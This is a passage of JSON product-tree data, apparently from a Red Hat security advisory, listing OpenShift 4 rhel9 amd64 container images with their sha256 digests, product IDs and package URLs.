"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"product_id": "registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-whereabouts-ipam-cni-rhel9@sha256%3Ad23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605545"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-must-gather-rhel9@sha256%3Ac3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564698"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"product_id": "registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-network-interface-bond-cni-rhel9@sha256%3A84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"product_id": "registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-network-metrics-daemon-rhel9@sha256%3A898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605534"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"product": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"product_id": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/network-tools-rhel9@sha256%3Afa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775607479"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"product_id": "registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-nutanix-cloud-controller-manager-rhel9@sha256%3A79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557301"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"product_id": "registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-nutanix-machine-controllers-rhel9@sha256%3Aea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557245"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"product_id": "registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-apiserver-rhel9@sha256%3A8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605934"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"product_id": "registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-olm-catalogd-rhel9@sha256%3A23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604244"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"product_id": "registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-olm-operator-controller-rhel9@sha256%3A72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604309"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"product_id": "registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-apiserver-rhel9@sha256%3A5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572127"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-controller-manager-rhel9@sha256%3A269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564516"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9@sha256%3A55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606187"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9-operator@sha256%3A988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606809"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cloud-controller-manager-rhel9@sha256%3Aa0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564624"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-framework-tools-rhel9@sha256%3Ae80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605528"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"product_id": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ovirt-csi-driver-rhel9@sha256%3A4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606167"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-rhel9@sha256%3Ae8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577363"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"product_id": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-block-csi-driver-rhel9@sha256%3A3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563654"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"product_id": "registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-block-csi-driver-rhel9-operator@sha256%3A97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775601995"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"product_id": "registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-cloud-controller-manager-rhel9@sha256%3A25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775563524"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-powervs-machine-controllers-rhel9@sha256%3A70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775562680"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"product": {
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"product_id": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/openshift-route-controller-manager-rhel9@sha256%3A6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565065"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"product_id": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-service-ca-rhel9-operator@sha256%3A38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604108"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"product_id": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tools-rhel9@sha256%3A99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564250"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vmware-vsphere-csi-driver-rhel9@sha256%3A79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557272"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vmware-vsphere-csi-driver-rhel9@sha256%3A79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557272"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256%3Abcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557320"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256%3Abcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557320"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vsphere-cloud-controller-manager-rhel9@sha256%3Afdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557686"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"product_id": "registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-vsphere-cluster-api-controllers-rhel9@sha256%3A75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557337"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-microshift-rhel9@sha256%3A4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577164"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"product_id": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prom-label-proxy-rhel9@sha256%3A47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606843"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-config-reloader-rhel9@sha256%3Abde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604108"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"product_identification_helper": {
